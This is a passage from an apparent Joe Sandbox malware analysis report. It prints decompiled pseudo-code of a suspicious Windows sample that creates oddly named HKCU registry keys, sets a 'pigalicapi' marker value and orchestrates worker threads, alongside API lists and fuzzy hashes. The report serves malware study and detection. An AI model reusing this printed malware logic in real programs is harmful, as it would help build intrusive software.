                                                                                                                                                                                                                                                                          • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                                          • Opcode ID: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                          • Instruction ID: 7ae4063a6f13a9051a7762c6ae15c07f15253da6e1139fe1377935b2c4657608
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB41F0B5A042189BEB24DF90CC45FDAB3FDFF48700F04C1E4A549A6181DE74AA81DFA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                                                                          				CHAR* _t35;
                                                                                                                                                                                                                                                                          				int _t39;
                                                                                                                                                                                                                                                                          				long _t43;
                                                                                                                                                                                                                                                                          				CHAR* _t51;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
                                                                                                                                                                                                                                                                          					E04007D20(_t27, "Sscculmqcxgnq", 0, 0xe);
                                                                                                                                                                                                                                                                          					lstrcpyA("Sscculmqcxgnq", "WDefault");
                                                                                                                                                                                                                                                                          					_t33 = E04005930(_a4 + 0x45b, "Sscculmqcxgnq", 0xd); // executed
                                                                                                                                                                                                                                                                          					E04007D20(_t33, _a8, 0, _a12);
                                                                                                                                                                                                                                                                          					_t35 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                          					if(lstrlenA(_t35) < _a12) {
                                                                                                                                                                                                                                                                          						_t51 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                          						lstrcpyA(_a8, _t51);
                                                                                                                                                                                                                                                                          						_t39 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                          						if(_t39 + lstrlenA(?str?) < _a12) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a8, "Sscculmqcxgnq");
                                                                                                                                                                                                                                                                          							_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                          							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
                                                                                                                                                                                                                                                                          							if(_t43 != 0) {
                                                                                                                                                                                                                                                                          								E04007D20(_t43, _a8, 0, _a12);
                                                                                                                                                                                                                                                                          								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v8 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04005a07
                                                                                                                                                                                                                                                                          0x04005a12
                                                                                                                                                                                                                                                                          0x04005a35
                                                                                                                                                                                                                                                                          0x04005a47
                                                                                                                                                                                                                                                                          0x04005a5d
                                                                                                                                                                                                                                                                          0x04005a6f
                                                                                                                                                                                                                                                                          0x04005a77
                                                                                                                                                                                                                                                                          0x04005a86
                                                                                                                                                                                                                                                                          0x04005a8c
                                                                                                                                                                                                                                                                          0x04005a97
                                                                                                                                                                                                                                                                          0x04005aa1
                                                                                                                                                                                                                                                                          0x04005ab9
                                                                                                                                                                                                                                                                          0x04005ac8
                                                                                                                                                                                                                                                                          0x04005ace
                                                                                                                                                                                                                                                                          0x04005ad5
                                                                                                                                                                                                                                                                          0x04005adc
                                                                                                                                                                                                                                                                          0x04005b00
                                                                                                                                                                                                                                                                          0x04005b08
                                                                                                                                                                                                                                                                          0x04005b20
                                                                                                                                                                                                                                                                          0x04005b31
                                                                                                                                                                                                                                                                          0x04005b0a
                                                                                                                                                                                                                                                                          0x04005b0e
                                                                                                                                                                                                                                                                          0x04005b0e
                                                                                                                                                                                                                                                                          0x04005b41
                                                                                                                                                                                                                                                                          0x04005b41
                                                                                                                                                                                                                                                                          0x04005ab9
                                                                                                                                                                                                                                                                          0x04005a86
                                                                                                                                                                                                                                                                          0x04005b4b

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(Sscculmqcxgnq,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                            • Part of subcall function 04005930: CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Sscculmqcxgnq), ref: 04005AAE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Sscculmqcxgnq), ref: 04005AC8
                                                                                                                                                                                                                                                                          • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 04005B31
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                                          • String ID: Sscculmqcxgnq$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                                          • API String ID: 4161867159-2182964826
                                                                                                                                                                                                                                                                          • Opcode ID: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                          • Instruction ID: 2f1465acc8a4d9a659e2af8a658b36752d7f83b1b7b92a7dc582af9786930c23
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40310775600208FBEB14DFA4DC49FAA37B9EB44708F04C615FA15BB281D7B8AA50CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005F30() {
                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                          				signed int _v9;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                                                                                          				int _v292;
                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                          				int _v328;
                                                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                                                          				CHAR* _t30;
                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                          				_t27 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_v8 = _t27;
                                                                                                                                                                                                                                                                          				E04007D20(_t27,  &_v284, 0, 0x104);
                                                                                                                                                                                                                                                                          				lstrcpyA( &_v284, "pigalicapi");
                                                                                                                                                                                                                                                                          				_t30 =  *0x4011898; // 0x4013fe2
                                                                                                                                                                                                                                                                          				lstrcatA( &_v284, _t30);
                                                                                                                                                                                                                                                                          				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				if(RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                          					_v292 = 0x20;
                                                                                                                                                                                                                                                                          					_v288 = 0x20;
                                                                                                                                                                                                                                                                          					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
                                                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                                                          						_v9 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t47 = _v9 & 0x000000ff;
                                                                                                                                                                                                                                                                          					if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						_v328 = 0x10;
                                                                                                                                                                                                                                                                          						E04009BD0(_t47,  &_v324, 0x10);
                                                                                                                                                                                                                                                                          						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					RegCloseKey(_v20);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v9;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x04005f39
                                                                                                                                                                                                                                                                          0x04005f3d
                                                                                                                                                                                                                                                                          0x04005f42
                                                                                                                                                                                                                                                                          0x04005f53
                                                                                                                                                                                                                                                                          0x04005f67
                                                                                                                                                                                                                                                                          0x04005f6d
                                                                                                                                                                                                                                                                          0x04005f7a
                                                                                                                                                                                                                                                                          0x04005f80
                                                                                                                                                                                                                                                                          0x04005f90
                                                                                                                                                                                                                                                                          0x04005f92
                                                                                                                                                                                                                                                                          0x04005f92
                                                                                                                                                                                                                                                                          0x04005f99
                                                                                                                                                                                                                                                                          0x04005fbb
                                                                                                                                                                                                                                                                          0x04005fc1
                                                                                                                                                                                                                                                                          0x04005fcb
                                                                                                                                                                                                                                                                          0x04005ff2
                                                                                                                                                                                                                                                                          0x04005ffa
                                                                                                                                                                                                                                                                          0x04005ffc
                                                                                                                                                                                                                                                                          0x04005ffc
                                                                                                                                                                                                                                                                          0x04006000
                                                                                                                                                                                                                                                                          0x04006006
                                                                                                                                                                                                                                                                          0x04006008
                                                                                                                                                                                                                                                                          0x0400601b
                                                                                                                                                                                                                                                                          0x0400603b
                                                                                                                                                                                                                                                                          0x0400603b
                                                                                                                                                                                                                                                                          0x04006045
                                                                                                                                                                                                                                                                          0x04006045
                                                                                                                                                                                                                                                                          0x04006051

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                          • RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                                          • String ID: $ $pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 764223185-550099112
                                                                                                                                                                                                                                                                          • Opcode ID: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                          • Instruction ID: d868066335aa3bc34e1d01a835705104c70e08da6b50357c6a08ba3ec109f492
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F3143B194021CABEB14CF90DC45FFEB7B8EB08704F048598EB04B6181D7B96A85CF60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04004096() {
                                                                                                                                                                                                                                                                          				void _t92;
                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                          				void* _t166;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				L0:
                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                          					L0:
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t171 =  *(_t161 - 0x34);
                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x34) != 0) {
                                                                                                                                                                                                                                                                          						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x34) = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					ResetEvent( *(_t161 - 0x10));
                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					_t92 = CreateThread(0, 0, E04004AC0, _t161 - 0x34, 0, 0); // executed
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x34) = _t92;
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x64) = E040097A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
                                                                                                                                                                                                                                                                          					E04007D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
                                                                                                                                                                                                                                                                          					_t166 = _t163 + 0x10;
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x60) = 0;
                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                          					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
                                                                                                                                                                                                                                                                          						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
                                                                                                                                                                                                                                                                          						E04007D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
                                                                                                                                                                                                                                                                          						_t166 = _t166 + 0xc;
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x58) =  *(_t161 + 8);
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
                                                                                                                                                                                                                                                                          						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          						_t114 = CreateThread(0, 0, E04004BA0, _t161 - 0x58, 0, 0); // executed
                                                                                                                                                                                                                                                                          						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
                                                                                                                                                                                                                                                                          						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
                                                                                                                                                                                                                                                                          						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
                                                                                                                                                                                                                                                                          						 *(_t161 - 1) = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
                                                                                                                                                                                                                                                                          						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
                                                                                                                                                                                                                                                                          					E040097C0( *(_t161 - 0x68));
                                                                                                                                                                                                                                                                          					if(( *(_t161 - 1) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					break;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				L22:
                                                                                                                                                                                                                                                                          				DeleteCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          				return  *(_t161 - 1);
                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                          0x0400409c
                                                                                                                                                                                                                                                                          0x040040a5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040040ab
                                                                                                                                                                                                                                                                          0x040040af
                                                                                                                                                                                                                                                                          0x040040b9
                                                                                                                                                                                                                                                                          0x040040c6
                                                                                                                                                                                                                                                                          0x040040cc
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040da
                                                                                                                                                                                                                                                                          0x040040de
                                                                                                                                                                                                                                                                          0x040040e6
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040f7
                                                                                                                                                                                                                                                                          0x04004101
                                                                                                                                                                                                                                                                          0x04004118
                                                                                                                                                                                                                                                                          0x0400411e
                                                                                                                                                                                                                                                                          0x0400413d
                                                                                                                                                                                                                                                                          0x04004143
                                                                                                                                                                                                                                                                          0x04004153
                                                                                                                                                                                                                                                                          0x04004158
                                                                                                                                                                                                                                                                          0x0400415b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400416d
                                                                                                                                                                                                                                                                          0x0400417f
                                                                                                                                                                                                                                                                          0x0400418e
                                                                                                                                                                                                                                                                          0x04004193
                                                                                                                                                                                                                                                                          0x04004199
                                                                                                                                                                                                                                                                          0x0400419f
                                                                                                                                                                                                                                                                          0x040041a5
                                                                                                                                                                                                                                                                          0x040041af
                                                                                                                                                                                                                                                                          0x040041bb
                                                                                                                                                                                                                                                                          0x040041d2
                                                                                                                                                                                                                                                                          0x040041bd
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041e3
                                                                                                                                                                                                                                                                          0x040041f7
                                                                                                                                                                                                                                                                          0x04004203
                                                                                                                                                                                                                                                                          0x0400420c
                                                                                                                                                                                                                                                                          0x04004216
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400422d
                                                                                                                                                                                                                                                                          0x04004242
                                                                                                                                                                                                                                                                          0x04004249
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400425e
                                                                                                                                                                                                                                                                          0x04004265
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x04004273
                                                                                                                                                                                                                                                                          0x04004277
                                                                                                                                                                                                                                                                          0x04004281
                                                                                                                                                                                                                                                                          0x0400428e
                                                                                                                                                                                                                                                                          0x04004294
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x040042a2
                                                                                                                                                                                                                                                                          0x040042a6
                                                                                                                                                                                                                                                                          0x040042af
                                                                                                                                                                                                                                                                          0x040042b6
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x040042c8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x040042cd
                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                          0x040042dd

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 371823443-0
                                                                                                                                                                                                                                                                          • Opcode ID: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                          • Instruction ID: 702011c11570e1e92260a3d6b56584955ffb64453fe6a6bb8e3d44d087611259
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51D7B5A40308AFEB18DF94D899BDDBBB1FB48704F108219F605BB2C0D774A940CB54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04004510(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                                                                                                          				void* _v784;
                                                                                                                                                                                                                                                                          				char _v1308;
                                                                                                                                                                                                                                                                          				long _v1312;
                                                                                                                                                                                                                                                                          				void* _v1316;
                                                                                                                                                                                                                                                                          				long _v1320;
                                                                                                                                                                                                                                                                          				intOrPtr _v1324;
                                                                                                                                                                                                                                                                          				intOrPtr _v1328;
                                                                                                                                                                                                                                                                          				signed int _v1332;
                                                                                                                                                                                                                                                                          				intOrPtr _v1336;
                                                                                                                                                                                                                                                                          				intOrPtr _v1340;
                                                                                                                                                                                                                                                                          				intOrPtr _v1344;
                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                                                                                          				signed char _t101;
                                                                                                                                                                                                                                                                          				signed char _t114;
                                                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L24:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
                                                                                                                                                                                                                                                                          					_t155 = _t153 + 0x18;
                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0,  &_v1308, 0x208);
